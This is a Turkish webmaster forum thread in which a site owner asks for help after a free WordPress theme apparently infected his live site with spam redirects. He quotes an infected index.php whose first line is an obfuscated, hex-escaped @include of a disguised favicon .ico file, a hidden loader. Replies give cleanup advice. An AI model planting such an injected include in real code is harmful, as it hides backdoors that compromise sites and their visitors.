lostyazilim
tr.link

Wordpress websitemde güvenlik açığı sebebiyle bazı sorunlar yaşıyorum.

9 Mesajlar 876 Okunma
acebozum
tr.link

omerkarasu97 omerkarasu97 WM Aracı Kullanıcı
  • Üyelik 15.02.2017
  • Yaş/Cinsiyet 27 / E
  • Meslek Öğrenci
  • Konum İstanbul Anadolu
  • Ad Soyad Ö** K**
  • Mesajlar 8
  • Beğeniler 0 / 1
  • Ticaret 0, (%0)
Herkese merhaba wordpress sitemde bazı sıkıntılar yaşıyorum hemen konuya gireyim :

Son zamanlarda yeni bir tema kullanmaya başladım , ne olduysa bu temayı kurduktan sonra başıma geldi.Tema bedava bir tema ve bazı saçma reklam yönlendirmeleri ve çince indeksler almaya başladı sitem.

İndex.php veya wp-config'imde sürekli include ile başlayan değişik kodlar yazılıyor.Silip düzeltsem ertesi gün yine aynısı başıma geliyor.

Örnek bir index.php dosyamı atıyorum




/*d9fa2*/

@include "\x2fhome\x23ini\x63lipv\x61/pub\x62ic_h\x74ml/h\x65alit\x79/wp-\x61dmin\x2ffavi\x63on_1\x305732\x2eico";

/*d9fa2*/
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );




Bunun ne olduğunu bilip yardımcı olacak arkadaşlara şimdiden teşekkür ederim.
 

 

elektronikssl
webimgo

73204 73204 WM Aracı Anonim Üyelik
  • Üyelik 05.02.2017
  • Yaş/Cinsiyet - /
  • Meslek
  • Konum
  • Ad Soyad ** **
  • Mesajlar 679
  • Beğeniler 374 / 202
  • Ticaret 26, (%96)
Merhaba
Size NumanABi yardımcı olabilir
NumanABi

kişi bu mesajı beğendi.

silenthilll silenthilll WM Aracı Kullanıcı
  • Üyelik 29.09.2011
  • Yaş/Cinsiyet 39 / E
  • Meslek öğrenci
  • Konum Manisa
  • Ad Soyad M** K**
  • Mesajlar 699
  • Beğeniler 61 / 126
  • Ticaret 1, (%100)
Tema dosyalarının değilde birde wordpress kendi dosyalarını silip tekrar temiz wordpess dosyalarını kurmanı o şekilde denemeni tavsiye ederim. Çünkü sen temadaki dosyalarındaki zararlı kodları silsende wp-include veya wp-admin klasorünün içinden bir kodlamayayla tekrar tema dosyalarına ekleme yapabilir.
 

 

silenthilll silenthilll WM Aracı Kullanıcı
  • Üyelik 29.09.2011
  • Yaş/Cinsiyet 39 / E
  • Meslek öğrenci
  • Konum Manisa
  • Ad Soyad M** K**
  • Mesajlar 699
  • Beğeniler 61 / 126
  • Ticaret 1, (%100)
Ek: wp-content klasorünü hariç tutarak senin wordpress dosyalarının toplamıyla zipten yeni çikardığın wordpress dosyalarının toplamina bakarakta anlayabilirsin eger kurduğun wordpressde fazla dosya varsa o dosyalardan kaynaklanıyor olabilir
 

 

wmaraci
wmaraci

silenthilll silenthilll WM Aracı Kullanıcı
  • Üyelik 29.09.2011
  • Yaş/Cinsiyet 39 / E
  • Meslek öğrenci
  • Konum Manisa
  • Ad Soyad M** K**
  • Mesajlar 699
  • Beğeniler 61 / 126
  • Ticaret 1, (%100)
Ek-2: wp-blog-header.php bunu yeni farkettim buyuk ihtimalle zararli kodu buna ve buna bağlı include edilmiş sayfaalarda yer almakta bunları incelemeni tavsiye ederim bu dosya wp-config.php olduğu yerde olması gerekir.
 

 

omerkarasu97 omerkarasu97 WM Aracı Kullanıcı
  • Üyelik 15.02.2017
  • Yaş/Cinsiyet 27 / E
  • Meslek Öğrenci
  • Konum İstanbul Anadolu
  • Ad Soyad Ö** K**
  • Mesajlar 8
  • Beğeniler 0 / 1
  • Ticaret 0, (%0)

silenthilll adlı üyeden alıntı

Tema dosyalarının değilde birde wordpress kendi dosyalarını silip tekrar temiz wordpess dosyalarını kurmanı o şekilde denemeni tavsiye ederim. Çünkü sen temadaki dosyalarındaki zararlı kodları silsende wp-include veya wp-admin klasorünün içinden bir kodlamayayla tekrar tema dosyalarına ekleme yapabilir.


Hepsini inceleyeceğim şimdi teşekkürler desteğin için
 

 

silenthilll silenthilll WM Aracı Kullanıcı
  • Üyelik 29.09.2011
  • Yaş/Cinsiyet 39 / E
  • Meslek öğrenci
  • Konum Manisa
  • Ad Soyad M** K**
  • Mesajlar 699
  • Beğeniler 61 / 126
  • Ticaret 1, (%100)
Acaba bu sıkıntıyı localhosttamı yoksa yayında olan bir sitenizde mi yaşıyorsunuz?
 

 

omerkarasu97 omerkarasu97 WM Aracı Kullanıcı
  • Üyelik 15.02.2017
  • Yaş/Cinsiyet 27 / E
  • Meslek Öğrenci
  • Konum İstanbul Anadolu
  • Ad Soyad Ö** K**
  • Mesajlar 8
  • Beğeniler 0 / 1
  • Ticaret 0, (%0)
Yayında olan bir site hocam
 

 

omerkarasu97 omerkarasu97 WM Aracı Kullanıcı
  • Üyelik 15.02.2017
  • Yaş/Cinsiyet 27 / E
  • Meslek Öğrenci
  • Konum İstanbul Anadolu
  • Ad Soyad Ö** K**
  • Mesajlar 8
  • Beğeniler 0 / 1
  • Ticaret 0, (%0)

silenthilll adlı üyeden alıntı

Ek-2: wp-blog-header.php bunu yeni farkettim buyuk ihtimalle zararli kodu buna ve buna bağlı include edilmiş sayfaalarda yer almakta bunları incelemeni tavsiye ederim bu dosya wp-config.php olduğu yerde olması gerekir.

wp-blog-header.php temiz hocam yeni indirilmiş wp-blog-header.php ile aynı kodlara sahip
 

 

wmaraci
wmaraci
Konuyu toplam 2 kişi okuyor. (0 kullanıcı ve 2 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al